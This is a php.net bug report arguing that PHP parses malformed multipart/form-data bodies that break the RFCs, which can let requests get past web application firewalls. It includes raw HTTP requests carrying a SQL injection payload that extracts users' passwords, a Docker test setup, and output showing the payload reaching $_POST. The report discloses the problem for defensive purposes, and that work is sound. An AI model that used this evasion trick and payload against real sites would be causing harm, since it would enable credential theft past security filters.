php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #81987 Incomplete Multipart/form-data but is passed to PHP
Submitted: 2023-03-10 16:08 UTC Modified: 2023-03-12 01:38 UTC
Votes:6
Avg. Score:4.7 ± 0.7
Reproduced:5 of 5 (100.0%)
Same Version:5 (100.0%)
Same OS:5 (100.0%)
From: me dot ekixu at gmail dot com Assigned:
Status: Open Package: HTTP related
PHP Version: Irrelevant OS: Linux
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: me dot ekixu at gmail dot com
New email:
PHP Version: OS:

 

 [2023-03-10 16:08 UTC] me dot ekixu at gmail dot com
Description:
------------
PHP passed Incomplete Multipart/form-data that conflicts with the requirements set by the RFC. It can cause WAF evasion.

As an example

```
POST / HTTP/1.1
User-Agent: Chrome/104.0.5112.102
Accept: */*
Host: 127.0.0.1:5980
Content-Length: 105
Content-Type:multipart/form-data;boundary=boundary

--boundary
Content-Disposition:name="id
1' union select 1,group_concat(user,0x3a,password) from users #
```

First according to RFC1867 there need a form-data token in Content-Disposition header 

Then A CRLF token to terminated sub-headers is excpet after Content-Disposition sub-header according to RFC1867

And The closing boundary which required by RFC1521 is also missing.

Not to mention that the name paramter have an unclosed quotation mark.

According to RFCs. A HTTP Request with multipart/form-data should like this

```
POST / HTTP/1.1
User-Agent: Chrome/104.0.5112.102
Cookie: PHPSESSID=r7kcra0ri3qln9hg7341loh3v7; security=low;
Accept: */*
Host: 127.0.0.1:5980
Content-Length: 130
Content-Type:multipart/form-data;boundary=boundary

--boundary
Content-Disposition:form-data;name="id"

1' union select 1,group_concat(user,0x3a,password) from users #
--boundary
```

However both of them can be passed by php server. As for SECURITY CONSIDERATIONS. It might be used by attack to bypass WAFs.(we had report this to related WAF vendors)





Test script:
---------------
We deploy the server behind nginx in php-fpm mode using docker-compose

```
version: '3'
services:
    web:
        image: nginx:latest
        ports:
            - "5980:80"
        volumes:
            - ./app:/home/wwwroot/
            - ./config/nginx/site.conf:/etc/nginx/conf.d/default.conf
        networks:
            - code-network
    php:
        image: php:7.4-fpm
        volumes:
            - ./app:/home/wwwroot/
        networks:
            - code-network
networks:
    code-network:
        driver: bridge
```

We've test php version from 5.6-fpm to the latest 8.2-fpm

And here is the server side script we used to detect $_POST values

```
<?php

var_dump("POST:",$_POST);
```



Expected result:
----------------
HTTP/1.1 200 OK
Server: nginx/1.23.3
Date: Fri, 10 Mar 2023 14:37:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Content-Length: 31

string(5) "POST:"
array(0) {
}


Actual result:
--------------
HTTP/1.1 200 OK
Server: nginx/1.23.3
Date: Fri, 10 Mar 2023 14:32:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Content-Length: 121

string(5) "POST:"
array(1) {
  ["id"]=>
  string(63) "1' union select 1,group_concat(user,0x3a,password) from users #"
}


Patches

pHqghUme (last revision 2024-07-20 03:24 UTC by testing at example dot com)
lxbfYeaa (last revision 2024-05-24 07:27 UTC by testing at example dot com)
christian.sewing (last revision 2023-03-13 05:34 UTC by christian dot sewing at db dot com)

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2023-03-12 01:38 UTC] stas@php.net
-Type: Security +Type: Bug
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Dec 03 17:01:29 2024 UTC